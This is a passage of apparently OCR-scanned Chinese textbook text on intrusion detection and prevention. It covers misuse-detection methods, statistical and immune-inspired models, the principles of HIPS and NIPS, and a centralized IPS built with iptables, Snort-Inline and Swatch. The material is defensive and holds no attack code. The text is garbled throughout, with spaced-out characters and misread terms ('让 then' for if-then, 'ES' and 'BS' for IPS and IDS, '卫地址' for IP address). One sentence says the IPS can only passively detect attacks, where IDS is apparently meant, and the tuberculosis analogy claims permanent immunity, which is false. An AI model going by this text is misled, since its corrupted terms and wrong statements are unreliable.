技术 比较 成 熟 ， 国 际 上 一 些 顶 尖 的 入 侵 检测 系统 都 采用 该 方法 ， 该 方法 也 存在 一 些 缺点 : 

(1) 不 能 检测 未 知 的 入 侵 行 为 。 由 于 其 检测 机 理 是 对 已 知 的 入 侵 方法 进行 模式 提取 ， 
对 于 未 知 的 入 侵 方 法 由 于 缺乏 认识 就 不 能 进行 有 效 的 检测 ， 也 就 是 说 漏 警 率 比较 高 。 

(2) 与 系统 的 相关 性 很 强 。 由 于 不 同 的 操作 系统 的 实现 机 制 不 同 ， 对 其 攻击 的 方法 
也 不 尽 相 同 ， 很 难 定义 出 统一 的 模式 库 。 另 外 由 于 已 知 认识 的 局 限 性 ， 难 以 检测 出 内 部 人 
员 的 蓄意 破坏 和 攻击 行为 ， 如 合法 用 户 的 泄露 。 

5. 误 用 入 侵 检测 模型 的 基本 方法 

误 用 检测 模型 常用 的 检测 方法 有 基于 条 件 概率 误 用 入 侵 检 测 方法 、 基 于 专家 系统 误 用 
入 侵 检 测 方法 、 基 于 状态 迁移 分 析 误 用 入 侵 检 测 方法 、 基 于 键盘 监控 误 用 入 侵 检测 方法 和 
基于 模型 误 用 入 侵 检测 方法 等 。 

1) ”基于 条 件 概率 的 误 用 入 侵 检测 方法 

基于 条 件 概率 的 误 用 入 侵 检测 方法 是 将 入 侵 的 方式 对 应 于 一 个 事件 序列 ， 并 通过 对 事 
件 发 生 的 情形 的 分 析 和 观察 来 推测 入 侵 的 一 种 方法 。 这 种 方法 的 依据 是 根据 贝 叶 斯 定理 
(Bayesian principles) 进行 推理 检测 入 侵 行为 。 

2) “基于 专家 系统 的 误 用 入 侵 检测 方法 

基于 专家 系统 的 误 用 入 侵 检测 模型 是 通过 将 安全 专家 的 经 验 知识 表示 成 让 then 规则 而 
形成 的 专家 知识 库 ， 然 后 运用 推理 算法 进行 入 侵 行 为 的 检测 。 

基于 专家 系统 的 误 用 入 侵 检测 系统 的 典型 模型 是 CLIPS 模型 ， 在 该 模型 中 , 将 入 侵 知 
识 进行 编码 表示 成 还 then 规则 ， 并 根据 相应 的 审计 跟踪 事件 的 断言 事实 。 编 码 规则 说 明 
攻击 的 必需 条 件 作 为 让 的 组 成 部 分 。 当 规则 的 左边 的 条 件 全 都 满足 时 ， 规 则 右边 的 动作 才 
会 执行 。 

在 基于 专家 系统 的 入 侵 检测 模型 中 ， 要 处 理 大 量 的 数据 和 依赖 于 审计 跟踪 的 次 序 。 其 
推理 方法 有 两 种 。 

(1) 根据 给 定 的 数据 ， 利 用 符号 推理 出 入 侵 行为 的 发 生 。 

(2) 根据 其 他 的 入 侵 证 据 ， 进 行 不 确定 性 的 推理 。 

3) ”基于 状态 迁移 分 析 的 误 用 入 侵 检测 方法 


状态 迁移 分 析 方 法 是 将 攻击 表示 成 一 系列 被 监控 的 系统 状态 迁移 。 攻 击 模式 的 状态 对 
应 于 系统 的 状态 ， 并 且 具 有 迁移 到 另外 状态 的 特性 ， 然 后 通过 弧 线 连续 的 状态 连接 起 来 表 
示 状 态 改变 所 需要 的 事件 。 

4) “基于 键盘 监控 的 误 用 入 侵 检测 方法 

基于 键盘 监控 系统 的 误 用 入 侵 检测 方法 是 假设 入 侵 者 对 应 的 击 键 序列 模式 ， 然 后 监测 
户 击 键 模式 ， 并 将 这 一 击 健 模式 与 入 侵 检测 模式 相 匹配 ， 以 检测 入 侵 行为 。 

5) ”基于 模型 的 误 用 入 侵 检测 方法 

基于 模型 的 误 用 入 侵 检测 方法 是 通过 建立 误 用 证 据 模型 ， 根 据 证 据 推理 来 做 出 误 用 发 
生 判 断 结论 。 

6. 异常 检测 模型 和 误 用 检测 模型 的 比较 


异常 检测 系统 试图 发 现 一 些 未 知 的 入 侵 行为 ， 而 误 用 检测 系统 则 是 检测 一 些 已 知 的 入 
侵 行为 。 

异常 检测 指 根据 使 用 者 的 行为 或 资源 使 用 状况 来 判断 是 否 有 入 侵 行 为 的 发 生 ， 而 不 依 
赖 于 具体 行为 是 否 出 现 来 检测 ， 而 误 用 检测 系统 则 大 多 是 通过 对 一 些 具 体 行为 的 判断 和 推 
理 ， 从 而 检测 出 入 侵 行为 。 

异常 检测 的 主要 缺陷 在 于 误 检 率 很 高 ， 尤 其 在 用 户 数目 众多 或 工作 行为 经 常 改变 的 环 
境 中 ， 而 误 用 检测 系统 由 于 依据 具体 特征 库 进 行 判断 ， 准 确 度 要 高 很 多 。 

异常 检测 对 具体 系统 的 依赖 性 相对 较 小 ， 而 误 用 检测 系统 对 具体 的 系统 依赖 性 很 强 ， 
移植 性 不 好 。 

7. 其 他 入 侵 检 测 模型 

1) ”基于 生物 免疫 的 入 侵 检 测 方法 

生物 免疫 系统 对 外 部 入 侵 的 病原 体 可 自动 进行 抵御 并 可 对 自身 进行 保护 ， 一 旦 抵御 了 
某 种 病原 体 的 攻击 后 ， 则 可 对 该 病原 体 产生 抗体 ， 即 自动 获得 免疫 功能 ， 当 该 病原 体 再 次 
入 侵 时 ， 即 可 迅速 进行 有 效 的 抵抗 。 以 人 为 例 ， 若 某 人 人 不幸 感染 了 结核 病 ， 治 愈 后 ， 他 就 
对 结核 病菌 产生 了 抗体 ， 以 后 就 再 也 不 会 感染 结核 病 了 。 

基于 生物 免疫 的 入 侵 检测 系统 就 是 通过 模仿 生物 有 机 体 的 免疫 能 力 ， 使 得 受 保护 的 系 
统 能 够 将 外 来 的 非法 攻击 行为 与 自我 合法 行为 区 分 开 来 ， 除 了 能 够 进行 相应 的 处 理 以 外 ， 
能 对 入 侵 的 行为 进行 详细 的 “记忆 ”( 即 自我 “学 习 ” 方 法 )， 当 下 一 次 再 次 出 现 这 种 攻击 
时 ， 即 可 迅速 进行 抵御 ， 以 达到 自我 保护 的 目的 。 

事实 上 ， 基 于 生物 免疫 系统 的 入 侵 检测 方法 是 将 异常 入 侵 检 测 方法 与 误 用 入 侵 检测 方 
法 进行 有 机 的 结合 。 这 种 方法 的 新 颖 之 处 在 于 将 生物 学 的 免疫 原理 应 用 到 计算 机 网 络 的 安 
全 保护 领域 之 中 。 

2) “基于 伪装 的 入 侵 检测 方法 

基于 伪装 的 入 侵 检 测 方法 是 通过 在 网 络 主机 上 构造 或 设置 一 些 虚 假 的 信息 ， 并 将 这 些 
信息 暴露 在 网 上 ， 若 非法 入 侵 者 对 这 些 信 息 感 兴趣 ， 反 复 访 问 这 些 数据 ， 或 反复 打开 相关 
的 文件 ， 或 下 载 这 些 文件 ， 就 可 以 断定 系统 已 受到 入 侵 攻击 ， 并 可 确定 当前 登录 者 就 是 非 
法 入 侵 者 。 这 一 技术 又 可 称 作 是 “ 蜜 缸 ”诱骗 技术 。 
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3) ”基于 统计 学 方法 的 入 侵 检测 系统 

基于 统计 的 检测 规则 认为 入 侵 行为 应 该 符合 统计 规律 。 例 如 ， 系 统 可 以 认为 一 次 密码 
尝试 失败 并 不 算是 入 侵 行为 ， 因 为 的 确 可 能 是 合法 用 户 输入 失误 ， 但 是 如 果 在 一 分 钟 内 有 
3 次 以 上 同样 的 操作 就 不 可 能 完全 是 输入 失误 了 ， 而 可 以 认定 是 入 侵 行为 。 因 此 ， 组 成 分 
析 策 略 的 检测 规则 就 是 表示 行为 频 度 的 阔 值 ， 通 过 检测 出 行为 并 统计 其 数量 和 频 度 就 可 以 
发 现 入 侵 。 

统计 模型 常用 于 对 异常 行为 的 检测 ， 在 统计 模型 中 常用 的 测量 参数 包括 审计 事件 的 数 
量 、 间 隔 时 间 和 资源 消耗 情况 等 。 目 前 ， 可 用 于 入 侵 检测 的 统计 模型 有 5 种 。 

操作 模型 假设 异常 可 通过 测量 结果 与 一 些 固定 指标 相 比较 得 到 ， 固 定 指标 可 以 根据 经 
验 值 或 一 段 时 间 内 的 统计 平均 得 到 ， 举 例 来 说 ， 在 短 时 间 内 的 多 次 失败 的 登录 很 可 能 是 口 
令 尝 试 攻击 。 

(1) 方差 。 计 算 参 数 的 方差 ， 设 定 其 置信 区 间 ， 当 测量 值 超过 置信 区 间 的 范围 时 表明 
有 可 能 是 异常 。 

(2) 多 元 模型 。 操 作 模型 的 扩展 ， 通 过 同时 分 析 多 个 参数 实现 检测 。 

(3) 马尔 柯 夫 过 程 模型 。 将 每 种 类 型 的 事件 定义 为 系统 状态 ， 用 状态 转移 矩阵 来 表示 
状态 的 变化 ， 若 对 应 于 发 生 事件 的 状态 矩阵 中 转移 概率 较 小 ， 则 该 事件 可 能 是 异常 事件 。 

(4) 时 间 序 列 分 析 。 将 事件 计数 与 资源 耗 用 根据 时 间 排 成 序列 ， 如 果 一 个 新 事件 在 该 
时 间 发 生 的 概率 较 低 ， 则 该 事件 可 能 是 入 侵 。 

入 侵 检测 的 统计 分 析 首 先 计 算 用 户 会 话 过 程 的 统计 参数 ， 再 进行 与 阔 值 比较 处 理 与 加 
权 处 理 ， 最 终 通过 计算 其 “可 疑 ”概率 分 析 其 为 入 侵 事 件 的 可 能 性 。 统 计 方 法 的 最 大 优点 
是 它 可 以 “学 习 ” 用 户 的 使 用 习惯 ， 从 而 具有 较 高 检 出 率 与 可 用 性 。 但 是 它 的 “学 习 ” 能 
力也 给 入 侵 者 以 机 会 ， 他 们 通过 逐步 “训练 ”使 入 侵 事件 符合 正常 操作 的 统计 规律 ， 从 而 
透 过 入 侵 检测 系统 。 

4) “基于 专家 系统 的 入 侵 检 测 方法 

基于 专家 系统 的 入 侵 检 测 方法 和 运用 统计 方法 与 神经 网 络 对 入 侵 进行 检测 的 方法 不 
同 ， 用 专家 系统 对 入 侵 进行 检测 ， 经 常 是 针对 有 特征 的 入 侵 行 为 。 

所 谓 的 规则 ， 即 是 知识 。 不 同 的 系统 与 设置 具有 不 同 的 规则 ， 且 规则 之 间 往 往 无 通用 
性 。 专 家 系统 的 建立 依赖 于 知识 库 的 完备 性 ， 知 识 库 的 完备 性 又 取决 于 审计 记录 的 完备 性 
与 实时 性 。 特 征 入 侵 的 特征 抽取 与 表达 是 入 侵 检 测 专家 系统 的 关键 。 将 有 关 入 侵 的 知识 
取 转 化 为 于 then 结构 (也 可 以 是 复合 结构 ), if 部 分 为 入 侵 特征 , then 部 分 是 系统 防范 措施 。 

运用 专家 系统 防范 有 特征 入 侵 行为 的 有 效 性 完全 取决 于 专家 系统 知识 库 的 完备 性 ， 建 
立 一 个 完备 的 知识 库 对 于 一 个 大 型 网 络 系统 往往 是 不 可 能 的 ， 且 如 何 根据 审计 记录 中 的 事 
件 ， 提 取 状 态 行为 与 语言 环境 也 是 较 困 难 的 。 

由 于 专家 系统 的 不 可 移植 性 与 规则 的 不 完备 性 ， 现 已 不 宜 单独 用 于 入 侵 检 测 ， 或 单独 
形成 商品 软件 。 较 适用 的 方法 是 将 专家 系统 与 采用 软 计算 方法 技术 的 入 侵 检 测 系统 结合 
一 起 ， 构 成 一 个 以 已 知 的 入 侵 规则 为 基础 ， 可 扩展 的 动态 入 侵 事件 检测 系统 ， 自 适应 地 进 
行 特征 与 异常 检测 ， 实 现 高 效 的 入 侵 检测 及 其 防御 。 


5.2.6 ”入 侵 防护 技术 IPS 


网 络 入 侵 事件 越 来 越 多 ， 黑 客 攻 击 水 平 逐 渐 提 高 ， 计 算 机 网 络 感染 病毒 、 遭 受 攻击 的 
速度 越 来 越 快 ， 然 而 在 受到 攻击 后 做 出 响应 的 时 间 不 断 滞后 。 传 统 的 防火 墙 和 IDS 已 经 不 
能 很 好 地 解决 这 一 问题 ， 因 此 需要 引入 一 种 新 的 计算 机 安全 技术 一 一 入 侵 防 御 技术 。 该 技 
术 是 在 应 用 层 的 内 容 检测 基础 上 加 上 主动 响应 和 过 滤 功 能 。 相 对 于 IDS 的 被 动 检测 及 误 报 
等 问题 ， 该 技术 采取 积极 主动 的 措施 阻止 恶意 的 攻击 ， 将 损失 降 到 更 小 。 

下 面 首先 对 与 入 侵 防 御 技术 有 关 的 软件 和 技术 进行 研究 和 分 析 ， 然 后 深入 研究 了 入 侵 
防御 技术 ， 为 克服 集中 式 入 侵 防 御 技术 带 来 的 缺陷 ， 提 出 了 一 种 新 的 入 侵 防 御 技术 一 一 负 
载 均衡 的 分 布 式 入 侵 防御 技术 。 

入 侵 检测 (IDS) 虽 然 已 经 在 市 场 上 存在 多 年 ， 但 是 ， 越 来 越 多 的 用 户 发 现 ， 它 不 能 满足 
新 网 络 环境 下 对 安全 的 需求 。 

IPS 只 能 被 动 地 检测 攻击 ， 而 不 能 主动 地 把 变化 英 测 的 威胁 阻止 在 网 络 之 外 。 因 此 ， 
人 们 迫切 地 需要 找到 一 种 主动 入 侵 防 护 解决 方案 ， 以 确保 企业 网 络 在 威胁 四 起 的 环境 下 正 
常 运行 。 入 侵 防 御 系 统 (Intrusion Prevention System 或 Intrusion Detection Prevention, 即 IPS 
或 IDP) 就 应 运 而 生 了 。ES 是 一 种 智能 化 的 入 侵 检测 和 防御 产品 , 它 不 但 能 检测 入 侵 的 发 生 ， 
而 且 能 通过 一 定 的 响应 方式 ， 实 时 地 中 止 入 侵 行 为 的 发 生 和 发 展 ， 实 时 地 保护 信息 系统 不 
受 实质 性 的 攻击 。IPS 使 得 BS 和 防火 墙 走向 统一 。 

目前 比较 流行 的 网 络 级 安全 防范 措施 是 使 用 专业 防火 墙 + 入 侵 检测 系统 IDS) 为 企业 
内 部 网 络 构 筑 一 道 安全 屏障 。 防火墙 可 以 有 效 地 阻止 有 害 数据 的 通过 , 而 IDS 则 主要 用 于 
有 害 数据 的 分 析 和 发 现 , 它 是 防火 墙 功能 的 延续 。 两 者 联动 , 可 及 时 发 现 并 减缓 DoS、DDoS 
攻击 ， 减 轻 攻 击 所 造成 的 损失 。 

最 近 市 场 上 出 现 了 一 种 将 防火 墙 和 IDS 两 者 合 二 为 一 的 新 产品 “入 侵 防御 系统 
(IntruSion Prevention System 简称 IPS)”。 它 不 但 能 检测 入 侵 的 发 生 ， 而 且 能 通过 一 定 的 
响应 方式 ， 实 时 地 中 止 入 侵 行为 的 发 生 和 发 展 ， 二 者 的 整合 大 幅度 地 提高 了 检测 和 阻止 网 
络 攻 击 的 效率 ， 是 今后 网 络 安全 架构 的 一 种 发 展 趋势 。 

将 入 侵 防 御 技术 应 用 到 具体 的 网 络 环境 后 ， 就 形成 了 入 侵 防 御 系统 : IPS。 

1. IPS 的 原理 

防火 墙 是 实施 访问 控制 策略 的 系统 ， 对 流 经 的 网 络 流量 进行 检查 ， 拦 截 不 符合 安全 策 
略 的 数据 包 。 入 侵 检测 技术 (IDS) 通 过 监视 网 络 或 系统 资源 ， 寻 找 违反 安全 策略 的 行为 或 攻 
击 迹象 ， 并 发 出 报警 。 传 统 的 防火 墙 指 在 拒绝 那些 明显 可 疑 的 网 络 流量 ， 但 仍然 允许 某 些 
流量 通过 ， 因 此 防火 墙 对 于 很 多 入 侵 攻 击 仍然 无 计 可 施 。 绝 大 多 数 IDS 系统 都 是 被 动 的 ， 
而 不 是 主动 的 。 也 就 是 说 ， 在 攻击 实际 发 生 之 前 ， 它 们 往往 无 法 预先 发 出 警报 。 而 入 侵 防 
护 系 统 (PS) 则 倾向 于 提供 主动 防护 ， 其 设计 宗旨 是 预先 对 入 侵 活 动 和 攻击 性 网 络 流量 进 
行 拦 截 ， 避 免 其 造成 损失 ， 而 不 是 简单 地 在 恶意 流量 传送 时 或 传送 后 才 发 出 警报 。IPS 是 
通过 直接 嵌入 到 网 络 流量 中 实现 这 一 功能 的 ， 即 通过 一 个 网 络 端 口 接收 来 自 外 部 系统 的 流 
量 ， 经 过 检查 确认 其 中 不 包含 异常 活动 或 可 疑 内 容 后 ， 再 通过 另外 一 个 端口 将 它 传送 到 内 
部 系统 中 。 这 样 一 来 ,有 问题 的 数据 包 , 以 及 所 有 来 自 同一 数据 流 的 后 续 数 据 包 , 都 能 在 IPS 
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设备 中 被 清除 掉 。 

IPS 实现 实时 检查 和 阻止 入 侵 的 原理 在 于 IPS 拥有 数目 众多 的 过 滤器 ,能 够 防止 各 种 攻 
击 。 当 新 的 攻击 手段 被 发 现 之 后 ，IPS 就 会 创建 一 个 新 的 过 滤器 。IPS 数据 包 处 理 引擎 是 专 
业 化 定制 的 集成 电路 ， 可 以 深层 检查 数据 包 的 内 容 。 如 果 有 攻击 者 利用 Layer 2 (介质 访问 
控制 ) 至 Layer 7( 应 用 ) 的 漏洞 发 起 攻击 ，IPS 能 够 从 数据 流 中 检查 出 这 些 攻击 并 加 以 阻止 。 
传统 的 防火 墙 只 能 对 Layer 3 或 Layer 4 进行 检查 ， 不 能 检测 应 用 层 的 内 容 。 防 火 墙 的 包 过 
滤 技术 不 会 针对 每 一 字 节 进行 检查 ， 因 而 也 就 无 法 发 现 攻击 活动 ， 而 IPS 可 以 做 到 逐一 字 
节 地 检查 数据 包 。 所 有 流 经 IPS 的 数据 包 都 被 分 类 ， 分 类 的 依据 是 数据 包 中 的 报头 信息 ， 
如 源 人 P 地 址 和 目的 了 P 地 址 、 端 口号 和 应 用 域 。 每 种 过 滤器 负责 分 析 相 对 应 的 数据 包 。 通 
过 检查 的 数据 包 可 以 继续 前 进 ， 包 含 恶意 内 容 的 数据 包 就 会 被 丢弃 ， 被 怀疑 的 数据 包 需 要 
接受 进一步 的 检查 。 
针对 不 同 的 攻击 行为 ，IPS 需要 不 同 的 过 滤器 。 每 种 过 滤器 都 设 有 相应 的 过 滤 规 则 ， 
为 了 确保 准确 性 ， 这 些 规则 的 定义 非常 广泛 。 在 对 传输 内 容 进 行 分 类 时 ， 过 滤 引 擎 还 需要 
参照 数据 包 的 信息 参数 ， 并 将 其 解析 至 一 个 有 意义 的 域 中 进行 上 下 文 分 析 ， 以 提高 过 滤 准 
确 性 。 


过 滤器 引擎 集合 了 流水 和 大 规模 并 行 处 理 硬件 ， 能 够 同时 执行 数 千 次 的 数据 包 过 滤 检 
查 。 并 行 过 滤 处 理 可 以 确保 数据 包 能 够 不 间断 地 快速 通过 系统 ， 不 会 对 速度 造成 影响 。 这 
种 硬件 加 速 技术 对 于 IPS 具有 重要 意义 , 因为 传统 的 软件 解决 方案 必须 串 行进 行 过 滤 检 查 ， 
会 导致 系统 性 能 大 打折 扣 。 

2. IPS 的 种 类 

1) ”基于 主机 的 入 侵 防护 (HIPS) 

HIPS 通过 在 主机 /服务 器 上 安装 软件 代理 程序 ， 防 止 网 络 攻 击 入 侵 操 作 系 统 以 及 应 用 
程序 。 基 于 主机 的 入 侵 防护 能 够 保护 服务 器 的 安全 弱点 不 被 不 法 分 子 所 利用 。Cisco 公司 的 
Okena、NAI 公司 的 McAfee Entercept、 冠 群 金 展 的 龙 渊 服务 器 核心 防护 都 属于 这 类 产品 ， 
因此 它们 在 防范 红色 代码 和 Nimda 的 攻击 中 ， 起 到 了 很 好 的 防护 作用 。 基 于 主机 的 入 侵 防 
护 技术 可 以 根据 自 定 义 的 安全 策略 以 及 分 析 学 习 机 制 来 阻 断 对 服务 器 、 主 机 发 起 的 恶意 入 
侵 。HIPS 可 以 阻 断 缓冲 区 溢出 、 改 变 登 录 口 令 、 改 写 动态 链接 库 以 及 其 他 试图 从 操作 系统 
夺取 控制 权 的 入 侵 行为 ， 整 体 提升 主机 的 安全 水 平 。 

在 技术 上 ，HIPS 采用 独特 的 服务 器 保护 途径 ， 利 用 由 包 过 滤 、 状 态 包 检测 和 实时 入 侵 
检测 组 成 分 层 防 护 体系 。 这 种 体系 能 够 在 提供 合理 吞吐 率 的 前 提 下 ， 最 大 限度 地 保护 服务 
器 的 敏感 内 容 ， 既 可 以 以 软件 形式 嵌入 到 应 用 程序 对 操作 系统 的 调用 当中 ， 通 过 拦截 针对 
操作 系统 的 可 疑 调 用 ， 提 供 对 主机 的 安全 防护 ， 也 可 以 以 更 改 操作 系统 内 核 程 序 的 方式 ， 
提供 比 操作 系统 更 加 严谨 的 安全 控制 机 制 。 

由 于 HIPS 工作 在 受 保护 的 主机 /服务 器 上 ， 它 不 但 能 够 利用 特征 和 行为 规则 检测 ， 

止 诸如 缓冲 区 溢出 之 类 的 已 知 攻击 ， 还 能 够 防范 未 知 攻 击 ， 防 止 针对 Web 页 面 、 ia 
源 的 未 授权 的 任何 非法 访问 。HIPS 与 具体 的 主机 /服务 器 操作 系统 平台 紧密 相关 ， 不 同 的 
平台 需要 不 同 的 软件 代理 程序 。 

2) ”基于 网 络 的 入 侵 防护 (NIPS) 

NIPS 通过 检测 流 经 的 网 络 流量 ,提供 对 网 络 系统 的 安全 保护 。 由 于 它 采 用 在 线 连接 方 
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式 ， 所 以 一 旦 辨识 出 入 侵 行为 ，NIPS 就 可 以 去 除 整 个 网 络 会 话 ， 而 不 仅仅 是 复位 会 话 。 同 
样 由 于 实时 在 线 ，NIPS 需要 具备 很 高 的 性 能 ， 以 免 成 为 网 络 的 瓶颈 ， 因 此 NIPS 通常 被 设 
计 成 类 似 于 交换 机 的 网 络 设备 ， 提 供 线 速 吞吐 速率 以 及 多 个 网 络 端口 。 

NIPS 必须 基于 特定 的 硬件 平台 , 才能 实现 千 兆 级 网 络 流量 的 深度 数据 包 检 测 和 阻 断 功 
能 。 这 种 特定 的 硬件 平台 通常 可 以 分 为 三 类 : 一 类 是 网 络 处 理 器 (网 络 芯片 )， 一 类 是 专用 
的 FPGA 编程 芯片 ; 第 三 类 是 专用 的 ASIC 芯片 。 

在 技术 上 ，NIPS 吸取 了 目前 NIDS 所 有 的 成 熟 技 术 ， 包 括 特 征 匹配 、 协 议 分 析 和 异常 
检测 。 特 征 匹 配 是 最 广泛 应 用 的 技术 ， 具 有 准确 率 高 、 速 度 快 的 特点 。 基 于 状态 的 特征 匹 
配 不 但 检测 攻击 行为 的 特征 ， 还 要 检查 当前 网 络 的 会 话 状 态 ， 避 免 受 到 欺骗 攻 击 。 

协议 分 析 是 一 种 较 新 的 入 侵 检 测 技术 ， 它 充分 利用 网 络 协议 的 高 度 有 序 性 ， 并 结合 高 
速 数据 包 捕捉 和 协议 分 析 ， 来 快速 检测 某 种 攻击 特征 。 协 议 分 析 正 在 逐渐 进入 成 熟 应 用 阶 
段 。 协 议 分 析 能 够 理解 不 同 协议 的 工作 原理 ， 以 此 分 析 这 些 协议 的 数据 包 ， 来 寻找 可 疑 或 
不 正常 的 访问 行为 。 协 议 分 析 不 仅仅 基于 协议 标准 (如 RFC)， 还 基于 协议 的 具体 实现 ， 这 
是 因为 很 多 协议 的 实现 偏离 了 协议 标准 。 通 过 协议 分 析 ，IPS 能 够 针对 插入 (Insertion) 与 规 
避 (Evasion) 攻 击 进行 检测 。 异 常 检测 的 误 报 率 比较 高 ，NIPS 不 将 其 作为 主要 技术 。 

3. NIPS 技术 特征 

IPS 可 以 被 看 做 是 增加 了 主动 拦截 功能 的 IDS。 以 在 线 方式 接 入 网 络 时 就 是 一 台 IPS， 
而 以 旁 路 方式 接 入 网 络 时 就 是 一 台 IDS。 但 是 ，IPS 绝 不 仅仅 是 增加 了 主动 拦截 的 功能 ， 
而 是 在 性 能 和 数据 包 的 分 析 能 力 方 面 都 比 IDS 有 了 质 的 提升 。 

IPS 技术 的 4 大 特征 如 表 5-1 所 示 。 


表 5-1 IPS 技术 的 4 大 特征 


特 征 描 述 

嵌入 式 运行 只 有 以 嵌入 模式 运行 的 IPS 设备 才能 够 实现 实时 的 安全 防护 , 实时 阻拦 所 
有 可 疑 的 数据 包 ， 并 对 该 数据 流 的 剩余 部 分 进行 拦截 

深入 分 析 和 控制 IPS 必须 具有 深入 分 析 能 力 ， 以 确定 哪些 严 意 流量 已 经 被 拦截 ， 根 据 攻击 
类 型 、 策 略 等 来 确定 哪些 流量 应 该 被 拦截 

入 侵 特征 库 高 质量 的 入 侵 特 征 库 是 ES 高 效 运行 的 必要 条 件 ，ES 还 应 该 定期 升级 入 
侵 特 征 库 ， 并 快速 应 用 到 所 有 传感器 

高 效 处 理 能 IPS 必须 具有 高 效 处 理 数 据 包 的 能 力 ， 对 整个 网 络 性 能 的 影响 保持 在 最 低 


水 平 

4. 集中 式 入 侵 防御 技术 

入 侵 防御 系统 通过 组 合 BS 和 防火 墙 的 功能 ， 能 有 效 解决 校园 网 安全 问题 。 

1) “集中 式 IPS 网 络 拓扑 结构 

集中 式 IPS 网 络 拓扑 结构 如 图 5-21 所 示 ， 运 行 IPS 的 主机 有 3 块 网 卡 ， 其 中 只 有 一 块 
网 卡 (eth2) 具 有 了 他 地址 (10.10.10.1) ， 主 要 是 用 于 系统 控制 。 另 外 两 块 网 卡 (eth0、eth1) 被 
配置 成 二 层 网 关 。 因 此 IPS 将 作为 网 桥 , 对 于 其 他 网 络 设备 和 主机 是 透明 的 , 如 图 5-21 所 示 。 
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5-21 集中 式 IPS 网 络 拓扑 结构 

集中 式 IPS 是 基于 二 层 网 关 技 术 ( 网 桥 ) 而 设计 的 ， 拥 有 3 块 以 太 网 网 卡 ， 其 中 eth0 与 
外 网 相连 ，ethl 与 内 网 相连 ， 接 口 eth0、ethl 均 工作 在 网 桥 模 式 ， 没 有 了 全 地 址 ， 这 样 不 但 
可 以 捕获 到 来 自 Intemet 的 攻击 ， 也 可 以 捕获 到 来 自 校园 网 的 攻击 ， 另 外 使 攻击 者 很 难 发 
现 IPS 的 存在 ， 因 此 不 会 发 现 他 的 攻击 正在 被 监控 。 同 时 ，IPS 还 拥有 另外 一 个 接口 eth2， 
它 有 一 个 卫 地 址 (10.10.10.1),， 目 的 是 方便 IPS 的 远程 管理 和 IDS 规则 集 的 及 时 更 新 。 要 求 
这 个 接口 要 有 比较 高 的 安全 性 ， 只 允许 特定 卫 地 址 和 端口 的 数据 包 通过 。 

集中 式 IPS 是 网 关 型 设备 ， 串 接 在 网 络 的 出 口 处 能 够 发 挥 其 最 大 的 作用 ， 比 较 简单 的 
自 署 方案 是 串 接 在 网 络 结构 中 防火 墙 的 位 置 ， 这 样 所 有 的 网 络 流 都 要 经 过 IPS。 集 中 式 IPS 
分 析 这 些 网 络 流 ， 根 据 分 析 结 果 拦 截 或 允许 网 络 流 。 

具体 设计 一 个 集中 式 IPS 涉及 的 关键 技术 有 : 数据 控制 、 数 据 捕获 、 报 警 机 制 。 集 中 
式 IPS 使 用 Linux 自 带 的 了 P Tables 作为 防火 墙 ， 并 安装 了 IDS Snort 、 网 络 入 侵 防 护 系统 
(NIPS)Snort-Mine 和 报警 工具 Swatch 。 

(1) 数据 控制 。 

网 络 入 侵 防护 系统 Snort-Inline 是 IDS Snort 的 修改 版 ， 可 以 由 libipq 接收 来 自 iptables 
的 数据 包 ， 然 后 根据 Snort 的 规则 集 决定 IP Tables 对 数据 包 的 处 理 策略 ， 从 而 可 以 拦截 攻 

(2) 数据 捕获 。 

数据 捕获 就 是 把 所 有 的 黑客 活动 记录 下 来 ， 然 后 通过 分 析 这 些 活动 来 了 解 黑客 入 侵 的 
工具 、 策 略 以 及 动机 。 为 了 在 不 被 黑客 发 现 的 情况 下 捕获 尽 可 能 多 的 数据 ， 并 保证 这 些 数 
据 的 完整 性 ，IPS 采取 了 防火 墙 日 志和 IDS 日 志 的 数据 捕获 机 制 。 

防火 墙 日 志 : 防火 墙 iptables 作为 数据 捕获 的 第 一 层 可 以 记录 所 有 出 入 IPS 的 连接 。 

IDS 日 志 : 通过 配置 文件 snortconf，IDS Snort 可 以 从 数据 链 路 层 收 集 所 有 的 网 络 数据 
包 ， 并 以 MySQL 数据 库 或 Tcp2dump 的 格式 保存 以 便于 数据 分 析 。 

(3) 报警 机 制 。 

一 旦 有 黑客 的 攻击 ,能 够 及 时 通知 管理 员 是 非常 重要 的 ,在 IPS 上 安装 监控 软件 Swatch 
来 实现 自动 报警 功能 。Swatch 通过 在 IP Tables 的 日 志文 件 中 匹配 关键 字 ， 确 定 是 否 有 黑 
客 攻击 校园 网 ， 一 旦 匹配 成 功 ，Swatch 将 会 发 送 E-mail 到 管理 员 的 邮箱 。 默 认 情 况 下 ， 
E-mail 的 内 容 会 包括 攻击 发 生 的 时 间 、 源 他 地 址 、 目 的 他 地 址 和 端口 等 信息 。 

2) “集中 式 的 缺陷 

集中 式 入 侵 防御 技术 需要 面 对 很 多 挑战 ， 其 中 主要 有 单 点 故障 、 性 能 瓶颈 、 误 报 和 漏 
报 三 点 。 
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(1) 单 点 故障 。 

集中 式 入 侵 防御 系统 必须 以 嵌入 模式 工作 在 网 络 中 ， 而 这 就 可 能 造成 瓶颈 问题 或 单 点 
故障 。 如 果 IDS 出 现 故 障 ， 最 坏 的 情况 也 就 是 造成 某 些 攻击 无 法 被 检测 到 ， 而 集中 式 IPS 
设备 出 现 问题 ， 就 会 严重 影响 网 络 的 正常 运转 。 如 果 集 中 式 IPS 出 现 故 障 而 关闭 ， 用 户 就 
会 面 对 一 个 由 IPS 造成 的 拒绝 服务 问题 ， 所 有 客户 都 将 无 法 访问 网 络 提供 的 服务 。 

(2) 性 能 瓶颈 。 

IPS 因为 是 旁 路 工作 ， 对 实时 性 要 求 不 高 ， 而 集中 式 IPS 串 接 在 网 络 上 ,而且 基于 应 用 
层 检测 。 这 意味 着 所 有 与 系统 应 用 相关 的 访问 ， 都 要 经 过 集中 式 IPS 过 滤 ， 这 样 就 要 求 必 
须 像 网 络 设备 一 样 对 数据 包 做 快速 转发 。 因 此 ， 集 中 式 IPS 需要 在 不 影响 检测 效率 的 基础 
上 做 到 高 性 能 的 转发 。 即 使 集中 式 IPS 设备 不 出 现 故 障 ， 它 仍然 是 一 个 潜在 的 网 络 瓶颈 ， 
不 仅 会 增加 滞后 时 间 ， 而 且 会 降低 网 络 的 效率 。 

(3) 误 报 和 漏 报 。 

误 报 率 和 漏 报 率 也 需要 集中 式 IPS 认真 面 对 。 在 繁忙 的 网 络 当中 ， 如 果 以 每 秒 需要 处 
